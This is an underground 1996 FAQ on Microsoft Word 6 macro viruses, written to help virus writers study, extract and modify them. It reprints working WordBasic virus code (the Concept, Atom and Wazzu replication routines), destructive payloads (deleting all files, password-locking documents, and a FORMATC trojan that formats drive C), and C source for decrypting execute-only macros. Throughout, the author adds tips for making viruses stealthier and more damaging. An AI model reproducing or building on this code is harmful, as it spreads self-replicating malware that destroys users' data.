-------------------------------------------------------------- The UNDERGROUND MS WORD 6.x MACRO VIRUSES FAQ V1.0 By , <****{=============- ' AuRoDrEpH, the Drow -------------------------------------------------------------- "Help to MICROFUCK WORD." -------------------------------------------------------------- -------------------------------------------------------------- TOPIC 1 : WHAT IS A WORD MACRO VIRUS? ========================================= A WORD MACRO Virus, is a macro or template file which masquerades as legitimate MS WORD documents . An infected *.DOC file, doesn't look any different to the average PC user, as it can still contain a normal document. The difference is that this document is really just a template or macro file, with instructions to replicate, and possibly cause damage. MS WORD will interpret the *.DOT macro/template file regardless of extension, as a template file. This allows for it being passed off as a legitimate document <*.DOC> This FAQ takes the position that a document is meant to be DATA, and a MACRO is at least a partially executable CODE. When a document has been infected, it has been merged with executable code in a multi-part file, part data/part executable. This tends to be hidden from the user, who expects a document to be data that is READ, and not some combination of DATA and executable code designed to be executed, often against the will of the user, to wreck havok. These viruses commonly tend to infected the global macros, which get automatically saved at the end of each session. When the next session of MS WORD opens, the infected Global Macros are executed, and the WORD Environment is now infected, and will in turn be likely to infect documents whenever they are opened, closed, and created during all future sessions. As a Virus, the WORD MACRO VIRUSES do REPLICATE. They can spread in most cases to any MS WINDOWS Environment or OS that runs a compatible copy of MS WORD 6.x or 7.x, MS WORD 6.x running on OS/2, as well as WORD for MAC 6.0 for MacOS. This makes it a multi-platform/multi-OS file infector. It also makes it one of the first non-research viruses to be successfully spread to all of these environments and OS's MS Word Macro Viruses reside in interpreted data that can spread to different OS's/platforms. These viruses do not spread via modification of executable machine code, but by modification of data in files that are interpreted by the Microsoft Word 6.0 program and any other versions of Word that support macros and WordBasic. WordBasic Macro Language is much simpler to learn and master than ASSEMBLER, or other popular higher Level programming languages, and for this reason, Vx people have taken to it as a viable alternative to learning and coding ASM . The thought of ticking users off on more than one platform has been around for years, and now thanks to MS WORD, and all it's compatible versions on other popular platforms, the Vx people have their wish. Another Bonus of this new outlet for Vx writers, is that many virus scanners only scan Executable files, leaving the .DOC files of WORD alone. It is important to note that many AV producers have now included scanners/cleaners to their software, allowing for the detection of existing MS WORD Macro Viruses. -------------------------------------------------------------- TOPIC 2: HOW STUDY A INFECTED DOCUMENT ======================================= You are happy, :-) You find the latest macro virus. And now, you want to study it, find the source code and modify it. OK, I'll explain... it's very easy. First of all, you make a copy of the NORMAL.DOT file (it's in the MSOFFICE\WINWORD\MODELES). In most case, the macro virus isn't dangerous, except for the trojan virus, FORMATC. In fact, when you read the document, it formats C:. So, a good idea is to run a TSR anti-virus like VIRSTOP. Now, you launch the WORD application, and ...(it's the time to execute)... then go to the menu TOOLS/OPTION and in the SAVE directory, click to select the option (ask for saving NORMAL.DOT). Then you take a look at the file with a hexeditor. A word document is composed of a first part, the data (text), then the macro and in the last part, the data (name of the file,...). OK. Find the name of the document near the end... and look for a "U". if you see some U's, this mean that the macros are encrypted. You will need more time to study because when you copy a macro, WORD gives you the option to READONLY: you can execute the macro, but you can't see the source... If you take a look for the name, you can see the macro of all the macros included in the file. The name can give you a idea of what they do,... but be careful !! Now, you open the infected document and see what it does. nothing ... It's normal !! Go to the menu TOOLS/MACRO. You can see the name of the macro(the same you see with the hexeditor) IF you can use the Modify button, the macro is Execute-only... THEN go to the TOPIC 4. Else you read the script and keep what you want... TOPIC 3: VIRUS EXAMPLES and what you can keep in mind ====================================================== I have studied some macro virus for you and I've commented them... -------------------------------------------------------------- 4.1: Concept Virus : ==================== Also known by the Aliases of WW6Macro, WinWord.Concept, Word Basic Macro Virus (WBMV), Word Macro 9508 and Prank Macro . This was the first MS Macro Virus to be detected by the Anti-Virus community, and the first Macro Virus to be considered in the wild, with infections spreading to the US, UK, France, Germany, Bulgaria, Canada, the Netherlands, Turkey, and Finland, and other Countries. A CONCEPT Infection is easy to notice, on the first execution of the virus infected document (on the first opening of the infected file) the MessageBox appears with digit "1" inside, and "Ok" button. Also, simply checking the TOOLS/MACROS option to check loaded macros, the presence of concept is apparent by the appearance of these 5 macros : AAAZFS * AAAZAO * AutoOpen PayLoad * FileSaveAs The infection routine of this virus : 'see if we're already installed For i = 1 To iMacroCount If MacroName$(i, 0, 0) = "PayLoad" Then bInstalled = - 1 End If If MacroName$(i, 0, 0) = "FileSaveAs" Then bTooMuchTrouble = - 1 End If Next i If Not bInstalled And Not bTooMuchTrouble Then 'add FileSaveAs and copies of AutoOpen and FileSaveAs. 'PayLoad is just for fun. iWW6IInstance = Val(GetDocumentVar$("WW6Infector")) sMe$ = FileName$() sMacro$ = sMe$ + ":Payload" MacroCopy sMacro$, "Global:PayLoad" sMacro$ = sMe$ + ":AAAZFS" MacroCopy sMacro$, "Global:FileSaveAs" sMacro$ = sMe$ + ":AAAZFS" MacroCopy sMacro$, "Global:AAAZFS" sMacro$ = sMe$ + ":AAAZAO" MacroCopy sMacro$, "Global:AAAZAO" At the end of each Macrocopy, you put ,1 and you have Execute-Only macros... just an idea :) -------------------------------------------------------------- 4.2: Nuclear : ============== Known widely as Winword.Nuclear, Wordmacro-Nuclear and Wordmacro-Alert. This virus was the first WordMacro virus to infect both data/documents as well as executables <.COM/.EXE/NEWEXE> In truth, it is 2 viruses, a macro virus which alters the Operating Environment of WORD, and an executable file infector . This makes NUCLEAR the first Macro Virus to also incorporate, or at least try to incorporate a classic File Infector Virus. This virus is actually quite ineffective in the destructive sense, detailed later in this document. The infected documents contains the following nine Macros... AutoExec AutoOpen FileSaveAs FilePrint FilePrintDefault InsertPayload * Payload * DropSuriv * FileExit which get copied into the GLOBAL Macro List. General detection of NUCLEAR is easy, simply view the macros listed under the Macros command under the Tools Menu. If Macros "InsertPayload", "Payload", and "DropSuriv" are listed, then you'll likely have a NUCLEAR infection. NUCLEAR hides itself from detection, by disabling the "PROMPT FOR CHANGES TO NORMAL.DOT" option. Changes are made, and the user doesn't notice anything. The "InsertPayload" Macro will cause the following text to be added to the end of printouts when printing documents. Every 12th printout will have the following text added... And finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC! which is appended to the file after the command to print is issued but prior to the actual printing. FAX's sent via a FAX Print Driver will also be affected, this much I know first hand. From testing, I came to the realization that some Vx putz will start messing with my outgoing faxes behind our backs. Another included Macro, is "Payload" which tries to delete IO.SYS, MSDOS.SYS and COMMAND.COM on April 5th. It is inaffective, as WordBasic can't reset the attributes of a file which has the System attribute set. It has been noted that a variant that does work is being circulated. The Second part of the Nuclear Virus is the executable infector. The DropSuriv Macro checks system time, and will attempt to drop the file infector between 17:00/18:00. However, the routine is flawed, and shouldn't work on any system. If DropSuriv DID work properly, it would search for the standard DOS util DEBUG.EXE, if found, the macro drops PH33r.SCR & EXEC_PH.BAT. The Bat File is executed, and then the hex dump file PH33r.SCR is converted from a DEBUG script into an executable, and is in turn executed. Later, the .SCR and the .BAT files are deleted to cover its tracks. The File infector then hooks INT 21h and writes itself at the end of COM/EXE/NewEXE files. Unconfirmed reports state that a NUCLEAR infected Macro with a fully operational DropSuriv Macro exist. The following text strings are in the executable infector... =Ph33r= Qark/VLAD The virus group VLAD publish it in the issue n4. (I think the entire version of this virus So, found them on the Net.) -------------------------------------------------------------- 4.3: Colors: ============= Colors, is the first WINWORD Macro Virus that could be called cute . This Virus has the noticeable ability to alter the Windows colors settings. If iModEvery = (iEvery - 1) Then sColors$(0) = "Background" sColors$(1) = "AppWorkspace" ... sColors$(19) = "InactiveTitleText" sColors$(20) = "ButtonHilight" For i = 0 To 20 SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256))) Next i End If Mac Word is immune to the payload but is still susceptable to the infection mechanism, which will attack documents. Detection of infections is easy, as infected documents appear with the template icon, rather than the usual document icon. Commonly known as Rainbow or WordMacro.Colors, this virus was freely posted to usenet newsgroups on October 14th, 1995. The Colors Virus will infect the global template upon opening of an infected document. An infected document contains the following macros: AutoOpen AutoClose AutoExec FileNew FileExit FileSave FileSaveAs ToolsMacro, and other macros. All Macros included in COLORS are Execute-Only, and cannot be viewed or edited by MicroSoft Word. If normal "clean" macros with the same names existed prior to infection, they will be overwritten by COLORS. The AutoExec Macro of COLORS is an EMPTY Macro, possibly designed to defeat any ANTI-MACRO-VIRUS schemes developed by the AV community. It accomplishes this by overwriting a "CLEANING/SCANNER" AutoExec Macro with COLORS empty one, effectively making the AV Scanner/Cleaner useless. COLORS will also enable AutoMacros in case you were smart and disabled them! It will also disable the MS Word's Prompt to save changes to NORMAL.DOT. [ OutilsOptionsEnregistrement .InviteGlobalDot = 0 ] Very interesting COLORS is crafty, as it can spread without the use of AUTO macros... thus defeating the DISABLE AUTOMACROS Feature. It does so via the Macros: File/New File/Save File/SaveAs File/Exit Tools/Macro COLORS will infect NORMAL.DOT whenever a user chooses any of the above functions. It also has limited stealth ability, earning it the title of being the first WINWORD STEALTH MACRO VIRUS. It accomplishes it's stealth actions, by hiding itself from the active listing, since attempting to view active macros would run the COLORS infected Tools/Macro, thus hiding it's own presence while simultaneously infecting your system. [ MacroTools .Name = sNames$(i), .Print = 1, .Delete ] Good !!! The COLORS virus will keep track of infections via a counter, named "countersu", which can be found under the [Windows] section of the WIN.INI file. Whenever an infected macro is executed, the counter is incremented by a count of one. It quickly adds up, when you consider how much you OPEN, CREATE, SAVE, EXIT, and CLOSE documents. When the increment counter reaches 299, and every 300th execution thereafter, COLORS will be triggered. COLORS will then make changes to the system colors setup, including text, background, borders, buttons, etc., using randomly determined colors. The new color scheme becomes apparent to the user during the next session of Windows. Colors ability to spread without the use of AutoExecute Macros, and its use of Advanced Stealth techniques signals a new level of MACRO virus technology. It also adds fuel to the VxD argument, as an on access scanner could prevent infection by this type of stealthy virus. You have the complete disassemblie in the previous issue.. so download it... -------------------------------------------------------------- 4.4: DMV: ========= Commonly known as WordMacro.DMV, DMV is an unremarkable TEST Virus, possibly the first to be created using the WORDBasic Language. Joel McNamera wrote it in the fall of 1994, as a real time TEST for some MACRO Virus Theories. The Virus was kept under wraps, and a detailed paper was published. This TEST virus was only released, as an educational aid, after the CONCEPT virus was discovered. DMV isn't a threat to anyone, as it announce itself upon infecting the system. Nothing to say, it's an old virus. and now, all the technique used was detected by most AVX. -------------------------------------------------------------- 4.5: HOT: ========= Also known as WORDMACRO HOT, WinWord.Hot. Not the most ingenious of the Macro Virus Family, it's biggest kick, is the ability to wait or sleep for awhile and then delete a file. WordMacro/Hot appears to be the first Word macro virus written in Russia. It was found in the wild in Russia in January 1996. Infected documents contain four execute-only macros: AutoOpen DrawBringInFrOut InsertPBreak ToolsRepaginat. MacIntosh Word Users will notice HOT, by examining the icon of the file... infected documents appear with the template icon, normal documents appear with the normal document icon. NOTE: WordMacro/Hot appears to be the first macro virus to use external functions, allowing Word macros to call any standard Windows API call. This makes the spreading function Windows 3.x specific, preventing Word for MAC and Word 7 for Win '95 from spreading the Virus. An error dialog will be displayed under Microsoft Word 7.0. Unable to load specified library HOT activates automatically via it's AutoOpen Macro adding a line LIKE... QLHot=34512 to Ms Word for Windows 6's WinWord6.INI file, which acts as a counter recorder system, setting a date 14 days in the future for payload activation. HOT then copies the included macros to the Global Template, NORMAL.DOT usually, revising their names... AutoOpen ==> StartOfDoc DrawBringInFrOut ==> AutoOpen InsertPBreak ==> InsertPageBreak ToolsRepaginat ==> FileSave A listing of the currently loaded macros in this infected environment will reveal the names in the right list. Loading another infected document will add the left list to the macro list plus the right list. NOTE: Macros have been saved with the 'execute-only' feature, which means that a user can't view or edit them. A clean WORD environment will produce the left list when viewing an infected document. HOT's FileSave macro cause the virus to randomly decide within 1-6 days from the infection date to activate whenever an effort to open files is made. Upon activation, a document will have it's contents deleted, by opening it, slecting the entire contents, delting them, and closing the document, saving it in it's now empty state. Users with c:\DOS\EGA5.CPI should be protected from this macro, as the author included a check for this file as a protective measure, noted in the source code as follows: '--------------------------------------------------------------- '- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) --- '- and if File C:DOSega5.cpi not exist (not for OUR friends) --- '--------------------------------------------------------------- HOT's InsertPBreak Macro inserts a page-break in current documents, which is used as a sign of a document already being infection by HOT. NOTE: WordMacro/Hot relies on the existence of KERNEL.EXE I can see this macro, if you have it, please send it to the mag.... thanks -------------------------------------------------------------- 4.6: MS WORD 2/MS WORD 6.x MACRO TROJAN WEIDEROFFEN: ==================================================== This is a new MACRO Trojan, that goes by the alias WinWord.Weideroffnen. It is technically a WinWord 2 infected document, that works eqwually well under MS WORD 6.x. It intercepts AutoClose, and attempts to play tricks with boot-up file AUTOEXEC.BAT. I haven't seen this macro virus, so I don't know... -------------------------------------------------------------- 4.7 WORDMACRO ATOM / ATOMIC ============================= This is a new Macro Virus, found in February 1996, which works along the same general ideas as the original Concept virus. The WordMacro/Atom virus is not known to be in the wild. The differences, when compared to the Concept Virus, follows: - All the macros in this virus have been marked EXECUTE ONLY, making them encrypted - Replication occures both during file openings, and file saves. - Atom comes with 2 destructive payloads On December 13th, it's first point of activation occures. It will attempt to delete all files in the current file directory. The second activation, password protects documents, restricting the users access to their own documents. This happens when the system clock seconds counter equals 13, and a File/Save As command is issued. The passowrd assigned to the documents is ATOM#1. If the user disables AUTOMACROS, Atom will be unable to execute and spread to other documents. Enabling the Prompt To Save NORMAL.DOT will prevent Atom from attacking and infecting the NORMAL.DOT file. Here is the source : Keep in mind the idea of put a passwd in a file, not a bad idea.... Macros: Atom Sub MAIN On Error Goto KillError If Day(Now()) = 13 And Month(Now() = 12) Then Kill "*.*" End If KillError: End Sub Macros: AutoOpen Sub MAIN Dim FN$ FN$ = FileName$() On Error Goto ErrorInfectGlobalTemplate If (CheckInfected = 0) Then MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1 MacroCopy FN$ + ":FileOpen", "FileOpen", 1 MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1 MacroCopy FN$ + ":Atom", "Atom", 1 SaveTemplate End If Call Atom ErrorInfectGlobalTemplate: End Sub Function CheckInfected CheckInfected = 0 If (CountMacros(0) >= 4) Then For I = 1 To CountMacros(0) If (MacroName$(I, 0) = "Atom") Then CheckInfected = 1 End If Next I End If End Function Macros: FileOpen Sub MAIN On Error Goto InfError Dim dlg As FileOpen GetCurValues dlg Dialog dlg FileOpen dlg MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1 MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1 MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1 MacroCopy "Atom", Dlg.Name + ":Atom", 1 FileSaveAs .Format = 1 InfError: End Sub Macros: FileSaveAs Sub MAIN Dim dlg As FileSaveAs GetCurValues dlg Dialog dlg If (Dlg.Format = 0) Or (Dlg.Format = 1) Then MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1 MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1 MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1 MacroCopy "Atom", WindowName$() + ":Atom", 1 Dlg.Format = 1 End If If (Second(Now()) = 13) Then ] easy... to block a document Dlg.Password = "ATOM#1" ] a idea why not put a randomize passwd ? End If FileSaveAs dlg End Sub -------------------------------------------------------------- 4.9 FORMATC MACRO TROJAN ========================== Also known as WORDMACRO.FORMATC, and FORMAT.C.Macro.Trojan The FORMATC Macro Virus, isn't even a virus, as it DOES NOT SPREAD. This makes it another MACRO TROJAN. This Trojan contains only one macro, AutoOpen, which will be executed automatically when a document is opened. The Macro AutoOpen, is READ ONLY, making it encrypted, and unreadable and editable. It is visiable in the Macro List. When FORMATC is executed, "triggered", it will run a dos session, in a minimized DOS box. It will run an Unconditional Format of the C drive. Here is the macro (Basic) but deadly... Sub MAIN sCmd$ = "echo y|format c: /u" Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0 End Sub If you want to execute DOS command, you have here a hint on how to do it. 4.10 WORDMACRO WAZZU ======================= WordMacro/Wazzu consists of a single AutoOpen macro; this makes it language independent, ie. this macro virus is able to infect localized versions of Word as well as the english Word. It's inserted in your text the word "Wazzu" ... why not.... Nothing more to said, classic... Sub MAIN On Error Goto errCaught FileSummaryInfo .Update Dim dlg As FileSummaryInfo GetCurValues dlg fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen" globMacro$ = "Global:autoOpen" MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10)) If MacroFile$ = "NORMAL.DOT" Then MacroCopy globMacro$, fileMacro$ FileSaveAs .Format = 1 Else MacroCopy fileMacro$, globMacro$ End If Payload Goto bye errCaught: bye: On Error Goto 0 End Sub Sub Payload For i = 1 To 3 If Rnd() < 0.2 Then RndWord SelectCurWord selWord$ = Selection$() DeleteWord RndWord Insert selWord$ + " " End If Next If Rnd() < 0.25 Then RndWord Insert "wazzu " <-------------------here's the payload StartOfDocument End If End Sub Sub RndWord FileSummaryInfo .Update Dim dlg As DocumentStatistics GetCurValues dlg wordNum = Int(Rnd() * Val(dlg.Words)) StartOfDocument WordRight wordNum End Sub TOPIC 5: HOW TO DO WITH EXECUTE-ONLY MACROS ============================================ Easy, when you copy a macro with the option 1, Microsoft Word encrypts the source of the macro, so when you look at the file, you can't see it.... But, the encryption they use is stupid :))) an XOR value... so the only difficult thing, it's to find the XOR key...you must scan the file and the Xor value is included... I explain the method : Locate the "real" filename of the document within the document, A few bytes after the end of the name, there is a "U", the byte immediately following is the ... XOR value to use. Now to find the beginning of the macros are usually at B89h or at 1509h. To locate, there is always the sequence A5h C6h 41h then a byte and then the XOR value.... This is the standard method, you must know that each macro has a specific XOR value.. when you look for the filename, you will find as many U's as you have macros in the document. I encountered some difficulties when the document is composed of encrypted macros and normal macros... In this case, try to delete some macros and decrypt... I can give you a little C source to help you. This source uses a brutal method, so you will have 1 macro readable by file.... try with the COLORS macro (last issue). I know that the soft. functions well. - --><-cut here--------------------------------- /********* (c) AURODREPH Productions 04/1996 **********/ #include "io.h" #include "stdlib.h" #include "stdio.h" #include "conio.h" #include "process.h" #include "fcntl.h" #include "string.h" #include "sys\stat.h" void main (void) { char Name[13]; char Target[13]; unsigned char *Buffer; int Handler, Handler1; unsigned int Offset; unsigned long Length = 0; int point, max, trouve, cledec, debmac, decfin; int stop,nbr,positcle,nbrmac,i; clrscr(); printf (" ******************************************************************\n"); printf (" * *\n"); printf (" * DECRYPT WORD 6.0 MACROS saved *\n"); printf (" * with the option Execute-only *\n"); printf (" * *\n"); printf (" * *\n"); printf (" * --- ,This file works only with files < 32 Ko. ---- *\n"); printf (" * <*****}===============- *\n"); printf (" * (z) ' AURODREPH Productions 04/1996 *\n"); printf (" * ver 0.666B *\n"); printf (" ******************************************************************\n"); printf ("\n"); printf("\n"); printf ("Name of the input file = "); scanf ("%12s",Name); printf ("\n"); printf ("Name of the output file = "); scanf ("%12s",Target); printf("\n"); printf ("Number of crypted macros = "); scanf ("%d",&nbrmac); printf("\n"); if (nbrmac > 50 ) {exit (0);} Handler = open (Name, O_BINARY | O_RDONLY , S_IREAD); if (Handler == -1) {printf ("The input file doesn't exist.\n"); exit(0);} Length = (unsigned long) lseek(Handler, 0, SEEK_END); lseek (Handler,0,SEEK_SET); Buffer = (unsigned char *) malloc((unsigned) Length); if (Buffer == NULL) printf ("Fail memory allocation.\n"); if (read(Handler, Buffer, (unsigned) Length) != Length) {printf ("The size of the file is > 32 ko)\n"); printf ("Try to remove some macros with WORD....\n"); exit (0);} point = 0; max = strlen(Name); trouve = 1; cledec = 0x00; debmac = 0x00; stop = 0; for (i=0; i= 0x61) & (Name[i]<= 0x7A)) { Name[i] = Name[i] & 0xDF ;} }; for (Offset = 0x0000; Offset < Length; Offset++) { if ((Buffer[Offset] == Name[point]) && (stop !=1)) { for (point = 1; point <= (max-1); point++) {if (Buffer [Offset+point] == Name[point]) { trouve = trouve+1; } } else trouve = 1; }; } if (trouve == max) {stop = 1;} if ((trouve == max) && (Buffer[Offset] == 0x55)) {cledec = Buffer[Offset+1]; trouve = 0; Buffer [Offset+1] = 0x00; positcle = Offset; } point = 0; }; if (cledec == 0x00) {printf (" Don't find the decrypted key... \n"); exit (0);} else printf ("Decrypted Key for the macro n 1 = %x \n", cledec); for (Offset = 0x0000; Offset < Length; Offset++) { if (Buffer[Offset] == 0xA5) {if ((Buffer [Offset+1] == 0xC6) || (Buffer [Offset+1] == 0xC4)) {if (Buffer [Offset+2] == 0x41) {if (Buffer [Offset+4] == cledec) {debmac = Offset+3; } } } } }; if (debmac == 0x00) {for (Offset = 0x0000; Offset < Length; Offset++) { if (Buffer[Offset] == cledec-1) {if (Buffer [Offset+1] == cledec) {debmac = Offset; } } }; } if (debmac == 0x00) { printf (" Don't find the beginning of the macro\n"); exit(0);} for (nbr = 1 ; nbr <= nbrmac ;nbr++) { if (nbr != 1) { printf ("\n"); printf (" I decrypt the macro n %d \n", nbr); Offset = positcle+24; if (Buffer[Offset] == 0x55) {cledec = Buffer [Offset+1]; Buffer [Offset+1] = 0x00; positcle = Offset; printf ("Decrypted Key for the macro n %d = %x \n", nbr,cledec); } else {printf (" Don't find the decrypted key ....\n");} } Offset = debmac; point = 0; decfin = 1; stop = 1; printf ( " I work "); do { if (stop == 400) {printf ("."); stop = 1 ;} Buffer[Offset+point] ^= cledec ; /* decryptage par XOR */ if (Buffer [Offset+point] == 0x64) {Buffer [Offset+point+1] ^= cledec; if (Buffer [Offset+point+1] == 0x1a) {Buffer [Offset+point+2] ^= cledec; if (Buffer [Offset+point+2] == 0x1b) {Buffer [Offset+point+3] ^= cledec; if (Buffer [Offset+point+3] != 0x64) {decfin = 0; debmac = Offset+point+3; Buffer [Offset+point+3] ^= cledec; } else Buffer [Offset+point+3] ^= cledec; } else Buffer [Offset+point+2] ^= cledec; } else Buffer [Offset+point+1] ^= cledec; } if ((Offset+point) == Length) {decfin = 0;} stop = stop + 1; point = point + 1; } while ( ( decfin != 0) ); printf ("\n"); printf (" End of decrypting the macro n %d \n", nbr); }; _fmode= O_BINARY; Handler1 = creat(Target, S_IFMT | S_IREAD | S_IWRITE); write (Handler1, Buffer,(unsigned) Length); close (Handler1); close (Handler); printf ("\n"); printf ("\n"); printf (" END ... \n"); printf ("\n"); printf (" The decrypted file is %s .\n", Target); } - ------------------><--- cut here ------------------------------------ -------------------------------------------------------------- This FAQ is Copyright (z) 1996 ______ _____ _____ _____ / __ \ __ __ / __ \ _____ / __ \ _____ ______ / __ \ ___ _ / /_/ / / / / / / / / / / __ \ / / / \ / __ // ___/ / / / / / // \ / / / / / /_/ / / /_/ / / /_/ // /_/ / / /_/// _/_ / /_/ / / _~ / /__/ /__/,/_____/ /__/ \ > \_____//________/ /_//_//_____/ / ____/ /__//__/ ====*****{=========-====\/======[ The DROW of UNDERDARK ]===\_/=============== ' MicroFuck (tm), Windows, Word, EXCEL are Copyright (z) 1995-96 MicroFuck Corp. All rights reserved to the virus makers... -------------------------------------------------------------- P.S : sorry but i don't use a ENGLISH version of Word, so some names of the instruction could be incorrect !!! Just use the F1 option and find the nearest name.... - ---------------------------------------------------------------------------